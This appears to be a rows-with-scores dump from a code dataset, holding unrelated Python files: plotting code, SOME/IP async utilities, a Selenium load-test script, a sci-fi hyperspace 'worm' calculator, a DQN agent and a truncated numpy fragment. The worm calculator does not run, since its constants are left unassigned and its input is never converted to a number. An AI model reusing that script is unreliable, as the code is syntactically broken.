plt.savefig(f"{output_title}/equity_curve.png")
plt.close()
print("** Plotting Drawdown Curve **")
plot_drawdown(trader)
plt.savefig(f"{output_title}/drawdown_curve.png")
plt.close()
print("** Plotting MCS **")
plot_monte_carlo(mcs)
plt.savefig(f"{output_title}/mcs.png")
plt.close()
print("** Plotting MAE **")
plot_mae(trader)
plt.savefig(f"{output_title}/mae.png")
plt.close()
print("** Plotting MFE **")
plot_mfe(trader)
plt.savefig(f"{output_title}/mfe.png")
plt.close()
print("** Plots completed **") | 0.476336 | 0.201813 |
from __future__ import annotations
import asyncio
import functools
import socket
import typing
def log_exceptions(msg="unhandled exception in {__func__}"):
"""
decorator that will catch all exceptions in methods and coroutine methods
and log them with self.log
msg will be formatted with __func__ as the called function's __qualname__ plus any
passed arguments
"""
def decorator(f):
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(self, *args, **kwargs):
try:
return await f(self, *args, **kwargs)
except Exception:
self.log.exception(
msg.format(__func__=f.__qualname__, *args, **kwargs)
)
else:
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception:
self.log.exception(
msg.format(__func__=f.__qualname__, *args, **kwargs)
)
return wrapper
return decorator
async def getfirstaddrinfo(
host, port, family=0, type=0, proto=0, sock=None, flags=0, loop=None
):
"""
retrieve sockaddr for host/port pair with given family, type, proto settings.
return first sockaddr. raises socket.gaierror if no result was returned.
"""
if sock is not None:
if family != 0 or type != 0 or proto != 0:
raise ValueError(
"family/type/proto and sock cannot be specified at the same time"
)
family = sock.family
type = sock.type
proto = sock.proto
if loop is None: # pragma: nobranch
loop = asyncio.get_event_loop()
result = await loop.getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags
)
if not result: # pragma: nocover
raise socket.gaierror(
socket.EAI_NODATA, f"no address info found for {host}:{port}"
)
return result[0]
T = typing.TypeVar("T")
async def wait_cancelled(task: asyncio.Task[T]) -> typing.Optional[T]:
# I'd go with try: await task; except asyncio.CancelledError, but this can not
# discern between task raising cancelled or this current task being cancelled.
await asyncio.gather(task, return_exceptions=True)
assert task.done()
if task.cancelled():
return None
return task.result() | src/someip/utils.py | from __future__ import annotations
import asyncio
import functools
import socket
import typing
def log_exceptions(msg="unhandled exception in {__func__}"):
"""
decorator that will catch all exceptions in methods and coroutine methods
and log them with self.log
msg will be formatted with __func__ as the called function's __qualname__ plus any
passed arguments
"""
def decorator(f):
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(self, *args, **kwargs):
try:
return await f(self, *args, **kwargs)
except Exception:
self.log.exception(
msg.format(__func__=f.__qualname__, *args, **kwargs)
)
else:
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception:
self.log.exception(
msg.format(__func__=f.__qualname__, *args, **kwargs)
)
return wrapper
return decorator
async def getfirstaddrinfo(
host, port, family=0, type=0, proto=0, sock=None, flags=0, loop=None
):
"""
retrieve sockaddr for host/port pair with given family, type, proto settings.
return first sockaddr. raises socket.gaierror if no result was returned.
"""
if sock is not None:
if family != 0 or type != 0 or proto != 0:
raise ValueError(
"family/type/proto and sock cannot be specified at the same time"
)
family = sock.family
type = sock.type
proto = sock.proto
if loop is None: # pragma: nobranch
loop = asyncio.get_event_loop()
result = await loop.getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags
)
if not result: # pragma: nocover
raise socket.gaierror(
socket.EAI_NODATA, f"no address info found for {host}:{port}"
)
return result[0]
T = typing.TypeVar("T")
async def wait_cancelled(task: asyncio.Task[T]) -> typing.Optional[T]:
# I'd go with try: await task; except asyncio.CancelledError, but this can not
# discern between task raising cancelled or this current task being cancelled.
await asyncio.gather(task, return_exceptions=True)
assert task.done()
if task.cancelled():
return None
return task.result() | 0.639624 | 0.088505 |
import logging
import random
import string
import sys
import unittest
from time import time, sleep
import apiritif
import os
import re
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from bzt.resources.selenium_extras import FrameManager, WindowManager
def setup():
driver = webdriver.Remote(command_executor='http://user:key@remote_web_driver_host:port/wd/hub',
desired_capabilities={
'app': '',
'browserName': 'firefox',
'deviceName': '',
'javascriptEnabled': 'True',
'platformName': 'linux',
'platformVersion': '',
'seleniumVersion': '',
'version': '54.0',
})
driver.implicitly_wait(3.5)
wnd_mng = WindowManager(driver)
frm_mng = FrameManager(driver)
vars = {
}
apiritif.put_into_thread_store(vars, driver, wnd_mng, frm_mng)
def teardown():
(_, driver, _, _) = apiritif.get_from_thread_store()
driver.quit()
class TestLocScRemote(unittest.TestCase):
def setUp(self):
(self.vars, self.driver, self.wnd_mng, self.frm_mng) = apiritif.get_from_thread_store()
def test_1_(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': '/',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('/'):
self.driver.get('http://blazedemo.com/')
WebDriverWait(self.driver, 3.5).until(econd.presence_of_element_located((By.XPATH, "//input[@type='submit']")), 'Element "//input[@type=\'submit\']" failed to appear within 3.5s')
self.assertEqual(self.driver.title, 'BlazeDemo')
body = self.driver.page_source
re_pattern = re.compile('contained_text')
self.assertEqual(0, len(re.findall(re_pattern, body)), "Assertion: 'contained_text' found in BODY")
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
})
def test_2_empty(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': 'empty',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('empty'):
pass
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
}) | tests/resources/selenium/generated_from_requests_remote.py |
import logging
import random
import string
import sys
import unittest
from time import time, sleep
import apiritif
import os
import re
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from bzt.resources.selenium_extras import FrameManager, WindowManager
def setup():
driver = webdriver.Remote(command_executor='http://user:key@remote_web_driver_host:port/wd/hub',
desired_capabilities={
'app': '',
'browserName': 'firefox',
'deviceName': '',
'javascriptEnabled': 'True',
'platformName': 'linux',
'platformVersion': '',
'seleniumVersion': '',
'version': '54.0',
})
driver.implicitly_wait(3.5)
wnd_mng = WindowManager(driver)
frm_mng = FrameManager(driver)
vars = {
}
apiritif.put_into_thread_store(vars, driver, wnd_mng, frm_mng)
def teardown():
(_, driver, _, _) = apiritif.get_from_thread_store()
driver.quit()
class TestLocScRemote(unittest.TestCase):
def setUp(self):
(self.vars, self.driver, self.wnd_mng, self.frm_mng) = apiritif.get_from_thread_store()
def test_1_(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': '/',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('/'):
self.driver.get('http://blazedemo.com/')
WebDriverWait(self.driver, 3.5).until(econd.presence_of_element_located((By.XPATH, "//input[@type='submit']")), 'Element "//input[@type=\'submit\']" failed to appear within 3.5s')
self.assertEqual(self.driver.title, 'BlazeDemo')
body = self.driver.page_source
re_pattern = re.compile('contained_text')
self.assertEqual(0, len(re.findall(re_pattern, body)), "Assertion: 'contained_text' found in BODY")
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
})
def test_2_empty(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': 'empty',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('empty'):
pass
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
}) | 0.170473 | 0.054853 |
# Number Of Worms, Length Of HP Each Worm Needs To Create, Length Of Each Worm and Diameter Of Each Worm
import math
# Possible Constants Related To Worms
MinLOHP = # ly
# MinLOHP means Minimum Length Of Hyperspace Pathway.
MaxLOHP = # ly
# MaxLOHP means Maximum Length Of HP.
MSDBITOHP = 0.0001369863 # ly
# MSDBITOHP means Minimum Safe Distance Between Intermediate Terminals Of HPs. Note: 0.0001369863 ly is 0.5 days of travel at 0.1 c.
# It's 1 295 103 418.56 km.
MinLOW = # km
# MinLOW means Minimum Length Of Worm.
MinDOW = # km
# MinDOW means Minimum Diameter Of Worm.
MaxDOW = # km
# MaxDOW means Maximum Diameter Of Worm.
TOH = # km
# TOH means Thickness Of Hull.
DOCC = # km
# DOCC means Diameter Of Conduit Coil.
DOHP = # km
# DOHP means Diameter Of HP.
HC = (TOH + DOCC) * 2
MMF = MaxDOW / MinDOW
# MMF means Maximum Multiplication Factor for diameter of worm.
MaxLOHPCWWOVD = ((MaxDOW + (HC * MMF - HC)) / MinDOW) ** 2 * MinLOHP
# MaxLOHPCWWOVD means Maximum Length Of HP Created With Worm Of Variable Diameter.
def user_input_handling_function_fifth():
print()
user_input = input('Enter: ')
print()
good_to_go = 'no'
errors = []
digits = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.']
while good_to_go == 'no':
for i in user_input:
if i not in digits:
print('The number must consist of digits. For example: 1, 12, 123.1 or 1234.1.')
errors.append('yes')
break
if 'yes' in errors:
print()
user_input = input('Re-enter: ')
print()
good_to_go = 'no'
errors = []
else:
good_to_go = 'yes'
return user_input
print('The length of a HP is in Light Years (LY).')
print()
print('What is the length of the HP?')
print()
LOHP = user_input_handling_function_fifth()
# LOHP means Length Of HP.
if LOHP < MinLOHP:
print('NOW:', 0)
# NOW means Number Of Worms.
else:
NOW = LOHP / MaxLOHP
if (NOW).is_integer() == True:
LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
# LOHPEWNTC means Length Of HP Each Worm Needs To Create.
print('NOW:', NOW)
print()
print('LOHPEWNTC:', LOHPEWNTC, 'LY')
print()
else:
NOW = math.ceil(NOW)
LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
print('NOW:', NOW)
print()
print('LOHPEWNTC:', LOHPEWNTC, 'LY')
print()
if LOHPEWNTC > MaxLOHPCWWOVD:
LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
DOEW = MaxDOW
print('LOEW:', LOEW, 'Km')
print()
print('DOEW:', DOEW, 'Km')
print()
else:
LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
MF = math.sqrt(LOHPEWNTC / MinLOHP)
## MF means Multiplication Factor.
DOEW = MinDOW * MF - (HC * MF - HC)
print('LOEW:', LOEW, 'Km')
print()
print('DOEW:', DOEW, 'Km')
print()
#FOc = 0.125 #<<----
# FOc means Fraction Of c. The sub-light velocity that the ship uses between intermediate terminals. 0.125 should be used to cut
# down some time while still having adequate sensor capability. Unhashtag to test.
#TTTHP = NOW * LOHPEWNTC / 64.0 + ((NOW - 1.0) * MSDBITOHP / FOc)
## TTTHP means Time To Travel HP. Unhashtag to test.
#print("TTTHP:", TTTHP, "years,", TTTHP * 12, "months,", TTTHP * 365, "days")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365, "days to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365 * 24, "hours to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test. | number_of_worms,_length_of_HP_each_worm_needs_to_create,_length_of_each_worm_and_diameter_of_each_worm.py |
# Number Of Worms, Length Of HP Each Worm Needs To Create, Length Of Each Worm and Diameter Of Each Worm
import math
# Possible Constants Related To Worms
MinLOHP = # ly
# MinLOHP means Minimum Length Of Hyperspace Pathway.
MaxLOHP = # ly
# MaxLOHP means Maximum Length Of HP.
MSDBITOHP = 0.0001369863 # ly
# MSDBITOHP means Minimum Safe Distance Between Intermediate Terminals Of HPs. Note: 0.0001369863 ly is 0.5 days of travel at 0.1 c.
# It's 1 295 103 418.56 km.
MinLOW = # km
# MinLOW means Minimum Length Of Worm.
MinDOW = # km
# MinDOW means Minimum Diameter Of Worm.
MaxDOW = # km
# MaxDOW means Maximum Diameter Of Worm.
TOH = # km
# TOH means Thickness Of Hull.
DOCC = # km
# DOCC means Diameter Of Conduit Coil.
DOHP = # km
# DOHP means Diameter Of HP.
HC = (TOH + DOCC) * 2
MMF = MaxDOW / MinDOW
# MMF means Maximum Multiplication Factor for diameter of worm.
MaxLOHPCWWOVD = ((MaxDOW + (HC * MMF - HC)) / MinDOW) ** 2 * MinLOHP
# MaxLOHPCWWOVD means Maximum Length Of HP Created With Worm Of Variable Diameter.
def user_input_handling_function_fifth():
print()
user_input = input('Enter: ')
print()
good_to_go = 'no'
errors = []
digits = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.']
while good_to_go == 'no':
for i in user_input:
if i not in digits:
print('The number must consist of digits. For example: 1, 12, 123.1 or 1234.1.')
errors.append('yes')
break
if 'yes' in errors:
print()
user_input = input('Re-enter: ')
print()
good_to_go = 'no'
errors = []
else:
good_to_go = 'yes'
return user_input
print('The length of a HP is in Light Years (LY).')
print()
print('What is the length of the HP?')
print()
LOHP = user_input_handling_function_fifth()
# LOHP means Length Of HP.
if LOHP < MinLOHP:
print('NOW:', 0)
# NOW means Number Of Worms.
else:
NOW = LOHP / MaxLOHP
if (NOW).is_integer() == True:
LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
# LOHPEWNTC means Length Of HP Each Worm Needs To Create.
print('NOW:', NOW)
print()
print('LOHPEWNTC:', LOHPEWNTC, 'LY')
print()
else:
NOW = math.ceil(NOW)
LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
print('NOW:', NOW)
print()
print('LOHPEWNTC:', LOHPEWNTC, 'LY')
print()
if LOHPEWNTC > MaxLOHPCWWOVD:
LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
DOEW = MaxDOW
print('LOEW:', LOEW, 'Km')
print()
print('DOEW:', DOEW, 'Km')
print()
else:
LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
MF = math.sqrt(LOHPEWNTC / MinLOHP)
## MF means Multiplication Factor.
DOEW = MinDOW * MF - (HC * MF - HC)
print('LOEW:', LOEW, 'Km')
print()
print('DOEW:', DOEW, 'Km')
print()
#FOc = 0.125 #<<----
# FOc means Fraction Of c. The sub-light velocity that the ship uses between intermediate terminals. 0.125 should be used to cut
# down some time while still having adequate sensor capability. Unhashtag to test.
#TTTHP = NOW * LOHPEWNTC / 64.0 + ((NOW - 1.0) * MSDBITOHP / FOc)
## TTTHP means Time To Travel HP. Unhashtag to test.
#print("TTTHP:", TTTHP, "years,", TTTHP * 12, "months,", TTTHP * 365, "days")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365, "days to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365 * 24, "hours to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test. | 0.435902 | 0.519278 |
import argparse
import numpy as np
import os
import sys
import random
import torch
from replaybuffer import ReplayBuffer
from network import LinearNetwork, ConvNetwork
class Agent(object):
"""Agent is defined here
"""
def __init__(self, args):
self.is_training = not args.eval
self.mode = args.mode
self.load_pretrained = args.load_pretrained
assert args.buffer_size >= args.batch_size
self.batch_size = args.batch_size
self.buffer = ReplayBuffer(args.buffer_size)
self.grid_size = args.grid_size
self.state_dim = args.state_dim
self.action_dim = args.action_dim
self.gamma = args.gamma
self.lr = args.lr
self.optimizer = args.optimizer
self.save_weights_dir = args.save_weights_dir
self.weight_decay = args.weight_decay
self.model = None
self.target_model = None
self.load_admm = False
self.admm_model = None
if self.mode == "linear":
self.model = LinearNetwork(self.state_dim, self.action_dim).cuda()
self.target_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
elif self.mode == "conv":
self.model = ConvNetwork(self.grid_size, self.action_dim).cuda()
self.target_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.model is not None
assert self.target_model is not None
self.update_target()
if self.load_pretrained:
pre_weight_path = os.path.join(self.save_weights_dir, 'pretrained', 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(pre_weight_path):
print("=> loading checkpoint '{}'".format(pre_weight_path))
checkpoint = torch.load(pre_weight_path)
self.model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('Weight path does not exist.')
self.model.train()
self.target_model.eval()
self.reset_optimizer(self.lr)
def print_model_weight(self):
"""print model weights
"""
for name, param in self.model.named_parameters():
if param.requires_grad:
print(name, param.data)
def reset_optimizer(self, lr):
"""reset optimizer learning rate.
"""
if self.optimizer == 'adam':
self.model_optim = torch.optim.Adam(self.model.parameters(), lr=lr)
elif self.optimizer == 'sgd':
self.model_optim = torch.optim.SGD(self.model.parameters(), lr=lr, momentum=0.5, weight_decay=self.weight_decay)
return
def update_target(self):
"""uodate target network weigths
"""
print("=> updating target network weights...")
self.target_model.load_state_dict(self.model.state_dict())
def load_admm_model(self):
"""load admm pruned model
"""
if self.mode == "linear":
self.admm_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
if self.mode == "conv":
self.admm_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.admm_model is not None
admm_weight_path = os.path.join(self.save_weights_dir, self.mode, 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(admm_weight_path):
print("=> loading ADMM checkpoint '{}'".format(admm_weight_path))
checkpoint = torch.load(admm_weight_path)
self.admm_model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('ADMM weight path does not exist.')
self.admm_model.eval()
def act(self, state, epsilon=0.0):
"""Output an action.
"""
if not self.is_training:
epsilon = 0.0
if random.random() > epsilon:
if isinstance(state, tuple):
state_var = []
for temp in state:
state_var.append(
torch.tensor(
temp, dtype=torch.float).unsqueeze(0).cuda()
)
state_var = tuple(state_var)
else:
state_var = torch.tensor(
state, dtype=torch.float).unsqueeze(0).cuda()
if not self.load_admm:
self.model.eval()
logits = self.model(state_var).detach().cpu().numpy()
else:
self.admm_model.eval()
logits = self.admm_model(state_var).detach().cpu().numpy()
action = np.argmax(logits)
else:
assert self.is_training == True
action = random.randrange(self.action_dim)
return action
def learning(self):
"""Extract from buffer and train for one epoch.
"""
data_list = self.buffer.sample(self.batch_size)
(states_curt, action_curt, rewards_curt, states_next, is_dones) = \
self._stack_to_numpy(data_list)
if isinstance(states_curt, tuple):
states_curt_var = []
for temp in states_curt:
states_curt_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_curt_var = tuple(states_curt_var)
else:
states_curt_var = torch.tensor(
states_curt, dtype=torch.float).cuda()
action_curt_var = torch.tensor(
action_curt, dtype=torch.long).cuda()
rewards_curt_var = torch.tensor(
rewards_curt, dtype=torch.float).cuda()
if isinstance(states_next, tuple):
states_next_var = []
for temp in states_next:
states_next_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_next_var = tuple(states_next_var)
else:
states_next_var = torch.tensor(
states_next, dtype=torch.float).cuda()
is_dones_var = torch.tensor(
is_dones, dtype=torch.float).cuda()
if self.is_training: # and not self.load_pretrained:
self.model.train()
else:
self.model.eval()
logits_curt_var = self.model(states_curt_var)
q_value = logits_curt_var.gather(1, action_curt_var.unsqueeze(1)).squeeze(1)
logits_next_var = self.target_model(states_next_var)
next_q_value = logits_next_var.max(1)[0]
expected_q_value = rewards_curt_var + \
self.gamma * next_q_value * (1 - is_dones_var)
loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
loss = torch.max(loss_mse, loss_mae)
self.model_optim.zero_grad()
loss.backward()
self.model_optim.step()
return loss.detach().item()
def eval_learning(self):
"""Extract from buffer and eval for one epoch.
"""
data_list = self.buffer.sample(self.batch_size)
(states_curt, action_curt, rewards_curt, states_next, is_dones) = \
self._stack_to_numpy(data_list)
if isinstance(states_curt, tuple):
states_curt_var = []
for temp in states_curt:
states_curt_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_curt_var = tuple(states_curt_var)
else:
states_curt_var = torch.tensor(
states_curt, dtype=torch.float).cuda()
action_curt_var = torch.tensor(
action_curt, dtype=torch.long).cuda()
rewards_curt_var = torch.tensor(
rewards_curt, dtype=torch.float).cuda()
if isinstance(states_next, tuple):
states_next_var = []
for temp in states_next:
states_next_var.append(
torch.tensor(
temp, dtype=torch.float).cuda()
)
states_next_var = tuple(states_next_var)
else:
states_next_var = torch.tensor(
states_next, dtype=torch.float).cuda()
is_dones_var = torch.tensor(
is_dones, dtype=torch.float).cuda()
if self.is_training: # and not self.load_pretrained:
self.model.train()
else:
self.model.eval()
logits_curt_var = self.model(states_curt_var)
logits_next_var = self.target_model(states_next_var)
next_q_value = logits_next_var.max(1)[0]
q_value = logits_curt_var.gather(1, action_curt_var.unsqueeze(1)).squeeze(1)
expected_q_value = rewards_curt_var + \
self.gamma * next_q_value * (1 - is_dones_var)
loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
loss = torch.max(loss_mse, loss_mae)
self.model_optim.zero_grad()
loss.backward()
self.model_optim.step()
return loss.detach().item()
def _stack_to_numpy(self, data_list):
ret = []
for temp_data in data_list:
if isinstance(temp_data[0], tuple):
temp_list = []
tuple_size = len(temp_data[0])
for _ in range(tuple_size):
temp_list.append([])
for curt_tup in temp_data:
for idx in range(tuple_size):
temp_list[idx].append(curt_tup[idx])
temp_ret_list = []
for temp in temp_list:
temp_ret_list.append(np.array(temp))
ret.append(tuple(temp_ret_list))
else:
temp_np = np.array(temp_data)
ret.append(temp_np)
return ret | agent.py | import argparse
import numpy as np
import os
import sys
import random
import torch
from replaybuffer import ReplayBuffer
from network import LinearNetwork, ConvNetwork
class Agent(object):
"""Agent is defined here
"""
def __init__(self, args):
self.is_training = not args.eval
self.mode = args.mode
self.load_pretrained = args.load_pretrained
assert args.buffer_size >= args.batch_size
self.batch_size = args.batch_size
self.buffer = ReplayBuffer(args.buffer_size)
self.grid_size = args.grid_size
self.state_dim = args.state_dim
self.action_dim = args.action_dim
self.gamma = args.gamma
self.lr = args.lr
self.optimizer = args.optimizer
self.save_weights_dir = args.save_weights_dir
self.weight_decay = args.weight_decay
self.model = None
self.target_model = None
self.load_admm = False
self.admm_model = None
if self.mode == "linear":
self.model = LinearNetwork(self.state_dim, self.action_dim).cuda()
self.target_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
elif self.mode == "conv":
self.model = ConvNetwork(self.grid_size, self.action_dim).cuda()
self.target_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.model is not None
assert self.target_model is not None
self.update_target()
if self.load_pretrained:
pre_weight_path = os.path.join(self.save_weights_dir, 'pretrained', 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(pre_weight_path):
print("=> loading checkpoint '{}'".format(pre_weight_path))
checkpoint = torch.load(pre_weight_path)
self.model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('Weight path does not exist.')
self.model.train()
self.target_model.eval()
self.reset_optimizer(self.lr)
def print_model_weight(self):
"""print model weights
"""
for name, param in self.model.named_parameters():
if param.requires_grad:
print(name, param.data)
def reset_optimizer(self, lr):
"""reset optimizer learning rate.
"""
if self.optimizer == 'adam':
self.model_optim = torch.optim.Adam(self.model.parameters(), lr=lr)
elif self.optimizer == 'sgd':
self.model_optim = torch.optim.SGD(self.model.parameters(), lr=lr, momentum=0.5, weight_decay=self.weight_decay)
return
def update_target(self):
"""uodate target network weigths
"""
print("=> updating target network weights...")
self.target_model.load_state_dict(self.model.state_dict())
def load_admm_model(self):
"""load admm pruned model
"""
if self.mode == "linear":
self.admm_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
if self.mode == "conv":
self.admm_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.admm_model is not None
admm_weight_path = os.path.join(self.save_weights_dir, self.mode, 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(admm_weight_path):
print("=> loading ADMM checkpoint '{}'".format(admm_weight_path))
checkpoint = torch.load(admm_weight_path)
self.admm_model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('ADMM weight path does not exist.')
self.admm_model.eval()
def act(self, state, epsilon=0.0):
"""Output an action.
"""
if not self.is_training:
epsilon = 0.0
if random.random() > epsilon:
if isinstance(state, tuple):
state_var = []
for temp in state:
state_var.append(
torch.tensor(
temp, dtype=torch.float).unsqueeze(0).cuda()
)
state_var = tuple(state_var)
else:
state_var = torch.tensor(
state, dtype=torch.float).unsqueeze(0).cuda()
if not self.load_admm:
self.model.eval()
logits = self.model(state_var).detach().cpu().numpy()
else:
self.admm_model.eval()
logits = self.admm_model(state_var).detach().cpu().numpy()
action = np.argmax(logits)
else:
assert self.is_training == True
action = random.randrange(self.action_dim)
return action
def learning(self):
"""Extract from buffer and train for one epoch.
"""
data_list = self.buffer.sample(self.batch_size)
(states_curt, action_curt, rewards_curt, states_next, is_dones) = \
self._stack_to_numpy(data_list)
if isinstance(states_curt, tuple):
states_curt_var = []
for temp in states_curt:
states_curt_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_curt_var = tuple(states_curt_var)
else:
states_curt_var = torch.tensor(
states_curt, dtype=torch.float).cuda()
action_curt_var = torch.tensor(
action_curt, dtype=torch.long).cuda()
rewards_curt_var = torch.tensor(
rewards_curt, dtype=torch.float).cuda()
if isinstance(states_next, tuple):
states_next_var = []
for temp in states_next:
states_next_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_next_var = tuple(states_next_var)
else:
states_next_var = torch.tensor(
states_next, dtype=torch.float).cuda()
is_dones_var = torch.tensor(
is_dones, dtype=torch.float).cuda()
if self.is_training: # and not self.load_pretrained:
self.model.train()
else:
self.model.eval()
logits_curt_var = self.model(states_curt_var)
q_value = logits_curt_var.gather(1, action_curt_var.unsqueeze(1)).squeeze(1)
logits_next_var = self.target_model(states_next_var)
next_q_value = logits_next_var.max(1)[0]
expected_q_value = rewards_curt_var + \
self.gamma * next_q_value * (1 - is_dones_var)
loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
loss = torch.max(loss_mse, loss_mae)
self.model_optim.zero_grad()
loss.backward()
self.model_optim.step()
return loss.detach().item()
def eval_learning(self):
"""Extract from buffer and eval for one epoch.
"""
data_list = self.buffer.sample(self.batch_size)
(states_curt, action_curt, rewards_curt, states_next, is_dones) = \
self._stack_to_numpy(data_list)
if isinstance(states_curt, tuple):
states_curt_var = []
for temp in states_curt:
states_curt_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_curt_var = tuple(states_curt_var)
else:
states_curt_var = torch.tensor(
states_curt, dtype=torch.float).cuda()
action_curt_var = torch.tensor(
action_curt, dtype=torch.long).cuda()
rewards_curt_var = torch.tensor(
rewards_curt, dtype=torch.float).cuda()
if isinstance(states_next, tuple):
states_next_var = []
for temp in states_next:
states_next_var.append(
torch.tensor(
temp, dtype=torch.float).cuda()
)
states_next_var = tuple(states_next_var)
else:
states_next_var = torch.tensor(
states_next, dtype=torch.float).cuda()
is_dones_var = torch.tensor(
is_dones, dtype=torch.float).cuda()
if self.is_training: # and not self.load_pretrained:
self.model.train()
else:
self.model.eval()
logits_curt_var = self.model(states_curt_var)
logits_next_var = self.target_model(states_next_var)
next_q_value = logits_next_var.max(1)[0]
q_value = logits_curt_var.gather(1, action_curt_var.unsqueeze(1)).squeeze(1)
expected_q_value = rewards_curt_var + \
self.gamma * next_q_value * (1 - is_dones_var)
loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
loss = torch.max(loss_mse, loss_mae)
self.model_optim.zero_grad()
loss.backward()
self.model_optim.step()
return loss.detach().item()
def _stack_to_numpy(self, data_list):
ret = []
for temp_data in data_list:
if isinstance(temp_data[0], tuple):
temp_list = []
tuple_size = len(temp_data[0])
for _ in range(tuple_size):
temp_list.append([])
for curt_tup in temp_data:
for idx in range(tuple_size):
temp_list[idx].append(curt_tup[idx])
temp_ret_list = []
for temp in temp_list:
temp_ret_list.append(np.array(temp))
ret.append(tuple(temp_ret_list))
else:
temp_np = np.array(temp_data)
ret.append(temp_np)
return ret | 0.444083 | 0.20834 |
import numpy as np
epsilon = 10e-10
kmax = 10000
def identity_minus(A, nr):
X = A * -1
